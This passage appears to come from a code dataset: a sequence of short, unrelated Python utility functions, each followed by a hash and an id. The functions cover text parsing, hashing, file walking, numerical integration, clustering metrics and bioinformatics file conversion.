                        choices=['native', 'application', 'off'],
                        default="native")
    return parser.parse_args()
7af2c93aaa51d83d15d6b24424ef4d4e59083db0
697,039
from typing import List
def csv_to_ints(school_description: str) -> List[int]:
    """Convert a comma separated string of integers to a list of integers.

    Returns
    -------
    list[int]
        The list of integers from the string of comma separated values.

    >>> csv_to_ints('3,8,0')
    [3, 8, 0]
    """
    return list(map(int, school_description.strip().split(',')))
199fe36a12ba5a95895110c0614761578bc786ca
697,040
def next_left(node):
    """Return the successor of *node* on this contour.

    The successor is the leftmost child when one exists, otherwise the
    node's thread.  Returns None if and only if *node* is on the highest
    level of its subtree.
    """
    return node.children[0] if node.children else node.thread
2ae9b2fec699f3a2da72901ad12f3a331c260044
697,041
import functools
def chainingmethod(func):
    """Declare a method as a chaining method: it runs, then returns self.

    :param func: real method to wrap
    """
    @functools.wraps(func)
    def fluent(self, *args, **kwargs):
        func(self, *args, **kwargs)
        return self
    return fluent
0e07d99bd196257483e50c6df119ad3c4f0128fd
697,042
def event_counter(json_, counter):
    """Count the number of events that happened during a game.

    inputs
    ------
    json_: iterable of event dicts with a ['type']['name'] entry
    counter: counter dictionary (mutated in place)

    returns
    -----
    counter: the same dict with updated counts
    """
    for entry in json_:
        counter[entry['type']['name']] += 1
    return counter
97a10f5f219cf383c419ba65764b4c9c3f47b5ec
697,043
import hashlib
import base64
def calc_md5(string):
    """Generate the base64-encoded MD5 hash of *string* (bytes in, bytes out)."""
    digest = hashlib.md5(string).digest()
    return base64.b64encode(digest).strip(b"\n")
88135c92de48fe45888a4a4243cce13fcddceca8
697,044
def get_content(file):
    """Return the full text contents of *file* as a string.

    If file 'bruh' contains "Hellor", get_content("bruh") returns 'Hellor'.
    """
    # `with` guarantees the handle closes even if read() raises; the
    # original leaked the handle on error.
    with open(file, "r") as handle:
        return handle.read()
ae86220be856e23ed143d77117a181054565eff0
697,045
import os
import fnmatch


def find_all_files(path, suffix="*.jpg"):
    """Breadth-first walk of *path*, returning absolute paths of all files
    whose names match the fnmatch pattern *suffix*."""
    pending = [path]
    found = []
    while pending:
        current = pending.pop(0)
        for name in os.listdir(current):
            entry = os.path.join(current, name)
            if os.path.isfile(entry):
                found.append(entry)
            else:
                pending.append(entry)
    return fnmatch.filter(found, suffix)
936b577953468f468f95e91a7c3ea2fc79450b18
697,046
def convert_to_float(frac_str):
    """Convert a fraction string such as "1/3" or "1 1/2" to a float.

    Parameters
    ----------
    frac_str: string
        A plain number ("0.5"), a bare fraction ("1/3"), or a mixed
        number with a leading whole part ("2 3/4").

    Returns
    -------
    The float value corresponding to the fraction string.
    """
    try:
        return float(frac_str)
    except ValueError:
        pass
    numerator, denominator = frac_str.split('/')
    try:
        leading, numerator = numerator.split(' ')
        whole = float(leading)
    except ValueError:
        # no whole part present
        whole = 0
    frac = float(numerator) / float(denominator)
    # a negative whole part pulls the fraction further negative
    if whole < 0:
        return whole - frac
    return whole + frac
4f4e2ad0e5eeee7a8cc54b8b724031a48a48d747
697,047
import re


def parse_fst_session_event(ev):
    """Parse an FST session event string, e.g.
    "<3>FST-EVENT-SESSION event_type=EVENT_FST_SESSION_STATE session_id=0 reason=REASON_STT"

    Returns a dictionary with the parsed fields ("type", "id",
    "old_state", "new_state", "reason"), or None when *ev* is not an FST
    session event or lacks an event type."""
    if "FST-EVENT-SESSION" not in ev:
        return None
    event = {'new_state': ''}  # this key always exists in the result
    type_match = re.search(r"event_type=(\S+)", ev)
    if type_match is None:
        return None
    event['type'] = type_match.group(1)
    # remaining fields are optional
    optional = (
        ('id', r"session_id=(\d+)"),
        ('old_state', r"old_state=(\S+)"),
        ('new_state', r"new_state=(\S+)"),
        ('reason', r"reason=(\S+)"),
    )
    for key, pattern in optional:
        match = re.search(pattern, ev)
        if match is not None:
            event[key] = match.group(1)
    return event
e57cb2561e23ad89bb42559ae90c61c22d98e977
697,048
from typing import List


def parse_input_file(file_path: str) -> List[List[int]]:
    """Parse a file of whitespace-separated integers, e.g.::

        21 22
        24
        12 7 21 23

    Each line becomes one inner list of ints.
    """
    rows: List[List[int]] = []
    with open(file_path) as input_file:
        for line in input_file:
            rows.append([int(token) for token in line.split()])
    return rows
f281dbcc7c9dc70eab491b1a334e0cb0cc3e45e4
697,049
def unlines(line):
    """Replace every newline in *line* with a single space.

    The previous docstring claimed newlines were *removed*; the
    implementation has always substituted a space for each newline, and
    that behaviour is preserved here.
    """
    return line.replace('\n', ' ')
0c2079d9694a8c48f8ddf0a87696ea89a72b1dc3
697,050
import random


def train_valid_test_split_by_conversation(conversations, split_ratio=[0.8, 0.1, 0.1]):
    """Train/Validation/Test split by randomly selected movies"""
    train_ratio, valid_ratio, test_ratio = split_ratio
    assert train_ratio + valid_ratio + test_ratio == 1.0

    total = len(conversations)

    # Deterministic in-place shuffle (NOTE: mutates the caller's list).
    random.seed(0)
    random.shuffle(conversations)

    # Boundary indices of the three partitions.
    cut_train = int(total * train_ratio)
    cut_valid = int(total * (train_ratio + valid_ratio))

    train = conversations[:cut_train]
    valid = conversations[cut_train:cut_valid]
    test = conversations[cut_valid:]

    print('Train set:', len(train), 'conversations')
    print('Validation set:', len(valid), 'conversations')
    print('Test set:', len(test), 'conversations')

    return train, valid, test
6084f28af77dd2598c9d563b4cbb1a7fda5423ac
697,051
import torch


def cheb_conv(laplacian, inputs, weight):
    """
    Chebyshev convolution.

    Args:
        laplacian (:obj:`torch.sparse.Tensor`): The laplacian corresponding to the current sampling of the sphere.
        inputs (:obj:`torch.Tensor`): The current input data being forwarded.
        weight (:obj:`torch.Tensor`): The weights of the current layer.

    Returns:
        :obj:`torch.Tensor`: Inputs after applying Chebyshev convolution.
    """
    B, V, Fin = inputs.shape
    K, Fin, Fout = weight.shape
    # B = batch size
    # V = nb vertices
    # Fin = nb input features
    # Fout = nb output features
    # K = order of Chebyshev polynomials

    # transform to Chebyshev basis: stack T_0(L)x .. T_{K-1}(L)x using the
    # recurrence T_k(L)x = 2 L T_{k-1}(L)x - T_{k-2}(L)x
    x0 = inputs.permute(1, 2, 0).contiguous()  # V x Fin x B
    x0 = x0.view([V, Fin * B])  # V x Fin*B
    inputs = x0.unsqueeze(0)  # 1 x V x Fin*B

    if K > 0:
        x1 = torch.sparse.mm(laplacian, x0)  # V x Fin*B
        inputs = torch.cat((inputs, x1.unsqueeze(0)), 0)  # 2 x V x Fin*B
        # NOTE(review): for K == 1 the stack already holds two terms here,
        # so the view([K, ...]) below would fail; this guard presumably
        # should read `K > 1` -- confirm against the upstream implementation.
        for _ in range(1, K - 1):
            x2 = 2 * torch.sparse.mm(laplacian, x1) - x0
            inputs = torch.cat((inputs, x2.unsqueeze(0)), 0)  # M x Fin*B
            x0, x1 = x1, x2

    inputs = inputs.view([K, V, Fin, B])  # K x V x Fin x B
    inputs = inputs.permute(3, 1, 2, 0).contiguous()  # B x V x Fin x K
    inputs = inputs.view([B * V, Fin * K])  # B*V x Fin*K

    # Linearly compose Fin features to get Fout features
    weight = weight.view(Fin * K, Fout)
    inputs = inputs.matmul(weight)  # B*V x Fout
    inputs = inputs.view([B, V, Fout])  # B x V x Fout

    return inputs
219d3d7055bbe588d3a25de1f05106436f867d24
697,055
def reencode(s):
    """Return *s* with non-ASCII characters replaced by XML character references."""
    encoded = s.encode('ascii', 'xmlcharrefreplace')
    return encoded.decode()
ff5bd9c2ac6754bf76f3935c947a3081f83a6781
697,056
def decode_note(message):
    """Decode a note update message (add/change/remove).

    Remove messages omit the pitch/pos fields and are therefore shorter.
    Returns ``(instrument_id, note_dict)``.
    """
    fields = [ord(ch) for ch in message[1:]]
    instrument_id = fields[0]
    note = {'id': fields[1]}
    if len(fields) > 2:
        note['pos'], note['pitch'] = fields[2], fields[3]
    return instrument_id, note
fbc5e1bfc39b91447226e6ac5c4c549a8b78de9b
697,057
from typing import List def _bucket_to_range(bucket: int, boundaries: List[float]) -> bytes: """Returns boundaries of bucket as string.""" if bucket == len(boundaries): end = 'inf' else: end = str(boundaries[bucket]) if bucket == 0: start = '-inf' else: start = str(boundaries[bucket - 1]) return ('[' + start + ', ' + end + ']').encode()
78ad10f1db48beba4c909635180e31dff7c5407e
697,058
import aiohttp
import json


async def fetch(url: str) -> dict:
    """GET *url* and decode the response body as JSON."""
    async with aiohttp.ClientSession() as session:
        async with session.get(url) as response:
            raw = await response.read()
    return json.loads(raw)
9694a77ebfcb78d70368e8ba305bd1f66b936d2c
697,059
import random


def distselect(weight_l):
    """Perform a weighted random selection over the weights in *weight_l*.

    Returns the selected index; raises for non-list input."""
    if not isinstance(weight_l, list):
        raise Exception("distselect requires a list of values")

    # Pair each weight with its index and accumulate the total weight.
    pairs = []
    total = 0
    for idx, raw in enumerate(weight_l):
        w = int(raw)
        total += w
        pairs.append((w, idx))

    # Lightest entries first (stable sort keeps ties in index order).
    pairs.sort(key=lambda p: p[0])

    remaining = random.randint(1, total)
    for w, idx in pairs:
        remaining -= w
        if remaining <= 0:
            return idx
    # Fallback: heaviest entry.
    return pairs[-1][1]
8877c957cbd3c82f37f9bec948fb64c1c33dc341
697,060
def load_grid(input_grid):
    """Return the puzzle's starting grid in array form.

    The textual input is currently always the same, so the parsed result
    is hard-coded; replace this function if the input format ever changes.
    """
    return [[".#./..#/###"]]
a7a01542aea9d2332c0e307044930538f8ee42d5
697,061
import requests


def retrieve_online_json(url: str) -> dict:
    """Download an online JSON document and return its decoded content.

    :argument url: The url where to find the json file to retrieve.
    :return: A dictionary containing all the downloaded data.
    """
    response = requests.get(url)
    return response.json()
d99d7219f91f2ab67bace1b0ef0d4e9c4201318e
697,062
import torch


def adjusted_rand_index(true_mask, pred_mask):
    """
    compute the ARI for a single image. N.b. ARI
    is invariant to permutations of the cluster IDs.
    See https://en.wikipedia.org/wiki/Rand_index#Adjusted_Rand_index.

    true_mask: LongTensor of shape [N, C, H, W]
        background == 0, object 1 == 1, object 2 == 2, ...
    pred_mask: FloatTensor of shape [N, K, 1, H, W] (mask probs)

    Returns:
        ari [N] (or the plain float 1. in the degenerate one-cluster case)
    """
    N, C, H, W = true_mask.shape
    # only need one channel
    true_mask = true_mask[:, 0]  # [N, H, W]

    # convert into one-hot [N, num_points, max_num_entities]
    true_group_ids = true_mask.view(N, H * W).long()
    true_group_oh = torch.nn.functional.one_hot(true_group_ids).float()
    # exclude background (id 0)
    true_group_oh = true_group_oh[..., 1:]
    max_num_entities = true_group_oh.shape[-1]

    # take argmax across slots for predicted masks
    pred_mask = pred_mask.squeeze(2)  # [N, K, H, W]
    pred_groups = pred_mask.shape[1]
    pred_mask = torch.argmax(pred_mask, dim=1)  # [N, H, W]
    pred_group_ids = pred_mask.view(N, H * W).long()
    pred_group_oh = torch.nn.functional.one_hot(pred_group_ids, pred_groups).float()

    # one true entity matched by one slot: ARI is 0/0, treat as agreement
    if max_num_entities == 1 and pred_groups == 1:
        return 1.

    n_points = H * W
    if n_points <= max_num_entities and n_points <= pred_groups:
        raise ValueError(
            "adjusted_rand_index requires n_groups < n_points. We don't handle "
            "the special cases that can occur when you have one cluster "
            "per datapoint")

    # nij[b, k, i] = number of points in both true group k and pred group i
    nij = torch.einsum('bji,bjk->bki', pred_group_oh, true_group_oh)
    a = torch.sum(nij, 1)  # points per predicted group
    b = torch.sum(nij, 2)  # points per true group

    # pair-counting form of the adjusted Rand index
    rindex = torch.sum(nij * (nij - 1), dim=[1, 2])
    aindex = torch.sum(a * (a - 1), 1)
    bindex = torch.sum(b * (b - 1), 1)
    expected_rindex = aindex * bindex / (n_points * (n_points - 1))
    max_rindex = (aindex + bindex) / 2
    ari = (rindex - expected_rindex) / (max_rindex - expected_rindex)
    return ari
19a56838b86e97188c68e537a2ef2312a3c76ed1
697,063
import re


def strip_markdown(s):
    """
    Strip some common markdown out of the description, for the cases
    where the description is taken from the first paragraph of the text.
    """
    without_brackets = re.sub(r"[\[\]]", "", s)
    return re.sub(r"\(.*\)", "", without_brackets)
e10e02ec385990e908e4096272df40f3dccee364
697,064
def get_expression_samples(header_line):
    """
    Parse header of expression file to return sample names and column indices.

    Args:
        header_line (str): Header line from expression file.
    Returns:
        exp_samples (dict): Dictionary of {sample_name (str): sample_data_index (int)}.
            sample_data_index is index for data in sample list, not the line
            as a whole. e.g.: [samp1, samp2, samp3] & [20, 10, 5] for data
            values, then {'samp1': 0}.
    """
    line_list = header_line.strip().split("\t")
    # the first four columns are annotation, samples start at index 4
    samples = line_list[4:]
    exp_samples = {}
    # enumerate fixes the old `samples.index(item)` lookup, which was
    # O(n) per column and returned the *first* occurrence for duplicated
    # header entries
    for samp_idx, item in enumerate(samples):
        sample = item.split(".")[0]
        exp_samples[sample] = samp_idx
    return exp_samples
615ee0421b1efaf4ef45cab9610cea883f9636b1
697,066
import sys
import re


def fastq_to_fasta(file, new_file):
    """
    Convert a FASTQ file to FASTA format.

    Fastq format short example:
    @SEQ_ID
    GATCTGG
    +
    !''****

    Fasta format short example:
    >SEQ_INFO
    GATCTGG

    Exits via sys.exit() if either file cannot be opened; returns the
    output path *new_file* on success.
    """
    try:
        file_handle_read = open(file, "rt")
        line = file_handle_read.readline()
    except EnvironmentError:
        sys.exit("ERROR: Unable to read file: " + file)

    try:
        file_out = open(new_file, "w")
    except EnvironmentError:
        sys.exit("ERROR: Unable to write file: " + new_file)

    # NOTE: a quality line consisting solely of A/T/G/C/N letters would be
    # (incorrectly) appended to the sequence; real FASTQ quality strings
    # normally contain other symbols, so this is usually harmless.
    sequence = ""
    sequence_id = ""
    # 'with' closes both handles even if an exception occurs mid-conversion
    with file_handle_read, file_out:
        while line:
            if line.startswith("@"):
                # flush the previous record before starting a new one
                if sequence:
                    file_out.write(sequence_id)
                    file_out.write(sequence + "\n")
                sequence_id = line.replace("@", ">", 1)
                sequence = ""
            # bugfix: the old character class "[A|a|T|t|...]" also matched
            # the literal '|'; list the nucleotide letters only
            elif re.search("^[AaTtGgCcNn]+$", line):
                sequence += line.rstrip()
            line = file_handle_read.readline()
        # write out the last sequence
        if sequence:
            file_out.write(sequence_id)
            file_out.write(sequence + "\n")
    return new_file
6c7acbefc2279bf78953357d7229dec68eac5e17
697,067
def evens(i):
    """Return True if the number *i* is even, else False."""
    return i % 2 == 0
2dafcad23f38f4c8a610d24646ef482ef7e99f43
697,069
def ot2bio_ts(ts_tag_sequence):
    """Convert an OT-style targeted-sentiment tag sequence to BIO tags.

    :param ts_tag_sequence: tags such as 'O' or 'T-<sentiment>'
    :return: equivalent sequence using 'O', 'B-<sentiment>', 'I-<sentiment>'
    """
    bio_tags = []
    prev_pos = '$$$'
    for tag in ts_tag_sequence:
        if tag == 'O':
            bio_tags.append('O')
            cur_pos = 'O'
        else:
            # subjective tag: cur_pos is 'T'
            cur_pos, sentiment = tag.split('-')
            # continue the span ('I') if the previous tag was also a target
            prefix = 'I' if cur_pos == prev_pos else 'B'
            bio_tags.append('%s-%s' % (prefix, sentiment))
        prev_pos = cur_pos
    return bio_tags
0b6ff5c84627b4fff7aad92201c122e23a9ca3a3
697,070
import os


def read_bboxes_data(file_path, images_folder):
    """Read bounding-box annotations from a text file.

    :param file_path: path to the txt file holding bounding-box records,
        one per line: ``image_name x1 y1 x2 y2 ...`` (space separated)
    :param images_folder: root directory of the images
    :return: ``{'images': [image paths], 'bboxes': [[[x1, y1, x2, y2]], ...]}``
    """
    images_path = []
    bboxes = []
    with open(file_path, 'r') as bboxes_file:
        for raw in bboxes_file:
            fields = raw.strip().split(' ')
            images_path.append(os.path.join(images_folder, fields[0]))
            bboxes.append([[float(v) for v in fields[1:5]]])
    return {'images': images_path, 'bboxes': bboxes}
15ce684172b8de3b1eab048331a7bdc520751bab
697,071
from typing import List


def is_cyclic(dp_heads: List[int]) -> bool:
    """Return True if the dependency-head list contains a cycle, else False.

    ``dp_heads[i]`` is the 1-based head index of word ``i + 1``; 0 denotes
    the root.  Each unvisited node's ancestor chain is walked until it
    reaches an already-validated node (acyclic) or revisits itself (cycle).
    """
    # prepend the virtual root at index 0 so heads index directly
    dp_heads = [0] + dp_heads
    detected = [False] * len(dp_heads)
    detected[0] = True
    # bugfix: iterate node indices 1..n directly; the old
    # `enumerate(dp_heads[1:])` walked indices 0..n-1, skipping the last
    # word entirely (a self-loop on the final word went undetected)
    for start in range(1, len(dp_heads)):
        if detected[start]:
            continue
        ancestors = set()
        node = start
        while not detected[node]:
            ancestors.add(node)
            node = dp_heads[node]
            if node in ancestors:
                return True
        # the whole chain reached a validated node: mark it acyclic
        for member in ancestors:
            detected[member] = True
    return False
078d32133a90cc3197ca22026ab7b38cec559d97
697,072
def add_column(sheet, meta_column, col, colname):
    """Add one empty column to a sheet and record it in *meta_column*.

    @param sheet : sheet to be updated
    @param meta_column : mapping of column name -> column number (updated)
    @param col : column number
    @param colname : text for row 0 in the column
        (NOTE(review): openpyxl cells are 1-indexed -- confirm row=0 is
        valid for the sheet implementation actually used here)
    """
    header_cell = sheet.cell(column=col, row=0)
    header_cell.value = colname
    meta_column[colname] = col
    return meta_column
9a85d8ef92851bf194c66e1e6b6a7fae9974ce1d
697,073
def composite_simpson(f, b, a, n):
    """
    Calculate the integral with the composite 1/3 Simpson's rule.

    Parameters:
        f: Function f(x)
        a: Initial point
        b: End point
        n: Number of intervals (should be even)

    Returns:
        [xi]: single-element list holding the integral estimate
    """
    h = (b - a) / n
    sum_odd = 0   # interior points with odd index (weight 4)
    sum_even = 0  # interior points with even index (weight 2)
    for i in range(1, n):
        x = a + i * h
        # removed a leftover debug print(x) that polluted stdout
        if i % 2 == 0:
            sum_even += f(x)
        else:
            sum_odd += f(x)
    xi = h / 3 * (f(a) + 2 * sum_even + 4 * sum_odd + f(b))
    return [xi]
eb06a4776248763a825c9c41f592b736af230238
697,074
def PyMapping_Check(space, w_obj):
    """Return 1 if the object provides mapping protocol, and 0 otherwise.
    This function always succeeds."""
    provides_mapping = space.ismapping_w(w_obj)
    return int(provides_mapping)
f9d0644fc5f7bfeaa3c08b2c2596a4658b2e508b
697,075
def create_shift_vars(prev_shift_vars, model, staff, shifts, shift_days):
    """Build shift variables for the current roster period and merge them
    with the previous period's variables (current entries win on clashes).
    """
    current = {}
    for staff_member in staff:
        for role in staff[staff_member]:
            for shift in shifts:
                for day in shift_days[shift]:
                    current[(staff_member, role, day, shift)] = model.NewBoolVar(
                        f"staff:{staff_member}_role:{role}_day:{day}_shift:{shift}"
                    )
    return {**prev_shift_vars, **current}
da61519cbe61cd066c8072382ccf659aad6829e9
697,076
def validate_field(field):
    """Return *field* unchanged when truthy, otherwise the empty string.

    :param field: value to validate
    :return: field if truthy, '' otherwise (None, '', 0 all map to '')
    """
    return field if field else ''
a7f631372914de355872063d80f40c586c098788
697,077
from random import randint


def generate_random_ip():
    """Return a random dotted-quad IPv4 address as a string.

    :return: a random stringified ip
    :rtype: str
    """
    octets = [str(randint(0, 255)) for _ in range(4)]
    return '.'.join(octets)
8ea26fc948664b1d84923f03960e9822a45ecc53
697,078
def linear_search(nums_array: list, search: int) -> int:
    """Linear search: return the index of the first occurrence of
    *search* in *nums_array*, or -1 when absent.

    Time complexity: O(N).
    """
    for index, value in enumerate(nums_array):
        if value == search:
            return index
    return -1
a02db3d42d6b6f1b8b2a82940d3e17d69bbd41e7
697,079
import math def _acosd(v): """Return the arc cosine (measured in in degrees) of x.""" return math.degrees(math.acos(v))
2e31e36a33a4ac25f2b2548733138dcbf910028f
697,081